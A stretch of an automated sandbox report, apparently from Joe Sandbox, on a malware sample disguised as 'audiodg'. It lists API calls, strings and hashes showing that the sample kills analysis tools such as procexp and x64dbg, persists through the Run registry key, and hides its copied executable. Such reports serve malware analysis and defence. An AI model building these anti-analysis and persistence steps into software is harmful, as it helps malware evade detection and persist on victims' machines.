                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53B84: RegCloseKey.ADVAPI32 ref: 00007FF6FDB53C0C
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF6FDB53C3C
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6FDB53E37
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53E24: Process32FirstW.KERNEL32 ref: 00007FF6FDB53E6A
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53E24: CloseHandle.KERNEL32 ref: 00007FF6FDB53E7C
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53E24: wcscmp.MSVCRT ref: 00007FF6FDB53E91
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53E24: OpenProcess.KERNEL32 ref: 00007FF6FDB53EA7
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53E24: TerminateProcess.KERNEL32 ref: 00007FF6FDB53ECA
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53E24: CloseHandle.KERNEL32 ref: 00007FF6FDB53ED8
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53E24: Process32NextW.KERNEL32 ref: 00007FF6FDB53EEB
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53E24: CloseHandle.KERNEL32 ref: 00007FF6FDB53EFD
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB539B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6FDB53B0C), ref: 00007FF6FDB539E4
                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF6FDB531C6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction ID: 16f14ca1dcf4758677778976c7a580c41338b4d83982e3b1ecf5cb71a2a80db4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 302156E0A2854290EB44FF2CD8917B962A0AF56750FD00571E53DC23EEFE2CB9698790

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6FDB53784
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53744: GetVolumeInformationW.KERNEL32 ref: 00007FF6FDB53801
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53744: wsprintfW.USER32 ref: 00007FF6FDB538A2
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB5390D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53922
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53935
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53945
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53958
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB5396D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53980
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53995
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                  • Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                  • Instruction ID: 5263f78e868254d5b3ecd22ebcbaddfb76b744c0016c41493aaffd35b6e7a715
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD1133617289C685DB60DF29F85476A7361FBC5B80F905031DA5E83AADFE3CE405C780

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction ID: 71a55892cb841e2ef39df32023a773600729b9e040b5a92c1d1baf51eb747c60
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08010066A0CA4182E730AF29E8483697771FBC9B65F940131D95EC26B8FF3CF5868640

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction ID: 748a31a7911445494c2d3ee879403bb70c59a96dc25fe3d6fdb2037d251955d9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F321D071A1CA8681E7709F19E84836AB3A0FBC5754F904235D56E826ECFF3DE455CB80
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                  • Instruction ID: c0614176c4a99e4a5f619819a67f41492dac7bcd77ea6e0f3def50b478571edc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10010C66A1CA41C2E720AF25F85832D7370FBCAB54F900131E99EC26ACFE2CE5458640
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction ID: 8322d1c12d68a71d46b9f01d43e088f7dbe2295dddbd74a4a06d97064c6450ea
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A31A77661CAC485D7709F19E4987AAB3A0F789740F800225DA9DC3BA8EF3DD554CB40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6FDB53784
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53744: GetVolumeInformationW.KERNEL32 ref: 00007FF6FDB53801
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53744: wsprintfW.USER32 ref: 00007FF6FDB538A2
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB5390D
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53922
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53935
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53945
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53958
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB5396D
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53980
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53995
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF6FDB53AB9
                                                                                                                                                                                                  • DeleteFileW.KERNEL32 ref: 00007FF6FDB53AC4
                                                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 00007FF6FDB53ADD
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 00007FF6FDB53AF5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: Services
                                                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                                                  • Opcode ID: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                                                  • Instruction ID: db6b48fe8eba5e2ede7734aeda1fbe641257d110543d8fec67587f88c91473f9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A0188A1B1858252DB60EF28E4543AA6360FB95744FC04031D25DC37ECFE2DE14DCB80
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                                                  • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                  • Instruction ID: 71d0681f09c2dba22b543448930a32ac3fe7e174ffd2831e801407f75f387f0e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A012976618B808AD7909F18F44471AB774F789794F801225EB9D83BA8EF7DD144CB40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction ID: b0c729d683ba21954be6b6030d57ddb26945fa4285959d4745612288422e6a27
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9311B1B1A0C68681E7709F15E44836A73A0FB85754F944335D6AD826DCFF3DE505DB40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction ID: c0c3ee1bd370ea325077beeb67d4d3ccc5c60224d203889877dbe02b42d67d87
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED31056662C6C186DB30DF64E4987AAB3A0FB85700F900126E69DC3A98EF7DD409CF40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                                                  • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                  • Instruction ID: 282e24ec09e2b9ae5283cad2cea4896ac6f5114c64c7859c94cc97c9345f12c2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD111F76628A8086D7909F18F44476A77A0FB857A0F505221F9AE83BE8EF6DE1458B00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB5390D
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53922
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53935
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53945
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53958
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB5396D
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53980
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53AA9), ref: 00007FF6FDB53995
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB546E4: CreateFileW.KERNEL32 ref: 00007FF6FDB5472B
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB540E4: GetCurrentProcess.KERNEL32 ref: 00007FF6FDB5414B
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB540E4: OpenProcessToken.ADVAPI32 ref: 00007FF6FDB5415E
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB540E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6FDB54186
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB540E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6FDB541B1
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB540E4: CloseHandle.KERNEL32 ref: 00007FF6FDB541BC
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB540E4: OpenProcess.KERNEL32 ref: 00007FF6FDB541D1
